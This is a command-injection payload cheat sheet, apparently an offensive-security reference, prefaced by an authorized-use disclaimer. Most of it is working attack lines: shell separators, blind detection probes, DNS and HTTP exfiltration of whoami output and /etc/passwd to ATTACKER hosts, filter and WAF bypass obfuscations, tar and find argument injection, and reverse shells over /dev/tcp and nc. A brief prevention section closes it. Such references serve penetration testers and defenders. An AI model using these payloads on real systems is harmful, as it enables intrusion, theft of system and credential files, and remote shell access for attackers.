COMMAND-INJECTION
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Detecting and exploiting OS command injection: separators, blind techniques, filter bypass and exfiltration. In-scope testing only.
SEPARATORS & OPERATORS#
; command2 # run sequentially (Unix)
& command2 # background / chain
&& command2 # run if previous succeeded
|| command2 # run if previous failed
| command2 # pipe
`command` # backtick substitution
$(command) # command substitution
%0a / \n # newline injection
Windows cmd: & && | ||
PowerShell: ; | &(call)
DETECTION#
Deterministic (time-based - reliable when no output):
; sleep 10
& ping -c 10 127.0.0.1
| timeout 10 # Windows
$(sleep 10)
Output-based:
; id
| whoami
& type C:\windows\win.ini
Out-of-band (DNS/HTTP) when blind:
; nslookup $(whoami).ATTACKER.oast.site
; curl http://ATTACKER/$(id | base64)
BLIND EXFILTRATION#
# DNS
; nslookup `whoami`.ATTACKER.tld
# HTTP
; wget http://ATTACKER/?d=$(cat /etc/passwd | base64 -w0)
# Time-based bit-by-bit when only sleep is observable
; if [ $(id -u) -eq 0 ]; then sleep 10; fi
FILTER / WAF BYPASS#
Spaces blocked:
cat</etc/passwd
{cat,/etc/passwd}
IFS=,;cat$IFS/etc/passwd
cat${IFS}/etc/passwd
Keyword blocked (obfuscation):
w'h'o'a'm'i
who$@ami
wh\oami
/bin/c?t /etc/passwd # wildcards
echo d2hvYW1p | base64 -d | sh # base64 the command
Slashes blocked:
${HOME:0:1} # -> "/"
cat ${IFS}$(echo -e '\x2f')etc$(echo -e '\x2f')passwd
ARGUMENT / SANDBOX INJECTION#
# Even without a separator, injecting a flag can be enough:
# e.g. into a "ping <host>" -> "-f" flood, or into tar "--checkpoint-action=exec=sh"
--checkpoint=1 --checkpoint-action=exec=sh cmd
# Injecting into find: -exec sh -c 'id' \;
UPGRADE TO A SHELL#
; bash -c 'bash -i >& /dev/tcp/ATTACKER/443 0>&1'
| busybox nc ATTACKER 443 -e /bin/sh
# See REVERSE SHELL cheatsheet / Reverse Shell Generator tool.
TOOLING#
commix -u 'http://t/?q=INJECT' # automated CMDi
ffuf + custom payload wordlist
Burp Intruder with SecLists command-injection lists
PREVENTION (blue side)#
- Never build shell strings from user input; use exec arrays / APIs
that don't invoke a shell.
- Strict allowlist of arguments; avoid shell=True.
- Least privilege for the executing process.
See also: LFI-RFI, SSRF-BYPASS, REVERSE SHELL, LOLBAS.